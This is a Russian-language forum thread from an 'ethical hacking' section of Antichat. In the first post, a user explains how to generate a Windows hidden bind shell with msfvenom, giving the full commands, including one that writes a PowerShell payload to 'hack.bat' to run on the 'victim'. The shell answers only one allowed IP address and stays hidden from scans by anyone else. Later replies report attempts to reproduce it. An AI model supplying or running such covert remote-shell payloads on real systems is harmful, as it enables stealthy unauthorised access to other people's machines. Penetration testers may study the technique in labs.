HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.12.2016, 02:35
<~DarkNode~>
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами: 5033900

Репутация: 0
По умолчанию




Привет колеги. Это будет коротенький пост из серии MustKnow(Нужно Знать). Как бы ничего нового но я посчитал нужным кинуть в копилку форума описания этого метода.
Ничего нового мы изобретать с вами не будем,а воспользуемся обычной генерацией полезной нагрузки средствами msfvenom,и я лишь немного прокомментирую этот способ полученияBIND SHELL-а.

И так, давайте для начала посмотрим все опции которые возможны при создании нашего скрытого бинд шелла,а так же глянем описания(Рекомендую всегда читать описания!):

Код:


Код:
msfvenom -p windows/shell_hidden_bind_tcp --payload-options


Как видим из списка опций - есть обязательный параметр AHOST ([Allowed IP Adress|Разрешенный айпишник]) И в описании читаем о том ,что мы поднимаем листенер на порту ,которой указывается опционально "параметр LPORT", и если мы будем стучатся на этот порт с айпишника который мы указали в параметре AHOST - то нам будет прилетать шелл,но если это будет любой другой айпи адресс - то удаленная машина будет отвечать RST пакетом и порт для соединения будет закрыт.Таким образом обнаружить открытый порт никто кроме нас не сможет(ну если конечно с нашего айпишника никто не будет сканит)

Давайте все же протестируем. Создадим полезную нагрузку:

Код:


Код:
msfvenom -p windows/shell_hidden_bind_tcp AHOST=192.168.137.137 lport=4444 -f psh-cmd -o hack.bat
AHOST -- разрешенный айпи (в моем случае 192.168.137.137)
lport-- порт для листенера
-f psh-cmd -- формат полезной нагрузки ( в моем случает однострочная команда для powershell)




Я специально для наглядности указал не свой айпи что бы показать как это работает.
Дальше запустим на стороне жертвы и попробуем просканировать на 4444 порт.











Как видите порт закрыт. Давайте сменим свой айпи на 192.168.137.137 и попробуем снова.





Проверим шелл:





Все работает с указанного айпи)
Надеюсь кому то будет полезным)
Всем спасибо)
 
Ответить с цитированием

  #2  
Старый 16.12.2016, 22:51
<~DarkNode~>
Новичок
Регистрация: 20.10.2016
Сообщений: 0
С нами: 5033900

Репутация: 0
По умолчанию

Цитата:

Bafomet сказал(а):

это скрытие от пользователя, системы или антивиря?

Это способ получение консоли удаленной машины с возможностью подключения только определенного айпи адреса,тоесть подключится к жертве можно будет только с того айпи,который мы указали в параметре AHOST. Это своего рода скрытие открытого порта у жертвы для всех остальных участников сети.
 
Ответить с цитированием

  #3  
Старый 18.12.2016, 22:32
ghostphisher
Новичок
Регистрация: 07.12.2016
Сообщений: 0
С нами: 4963406

Репутация: 0
По умолчанию

Я наверное самый пентестер неудачный =))))

PORT STATE SERVICE
4567/tcp closed tram

Делаю все по списку Четко, видтать win xp не пробиваемая система =)))
 
Ответить с цитированием

  #4  
Старый 05.03.2018, 21:47
jonni_vu
Познающий
Регистрация: 20.02.2018
Сообщений: 43
С нами: 4330456

Репутация: 0
По умолчанию

У меня при запуске shella на вирт. wind7 постоянно порт open. shell получал с разных ahost. Почему?настроен сетевой мост.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.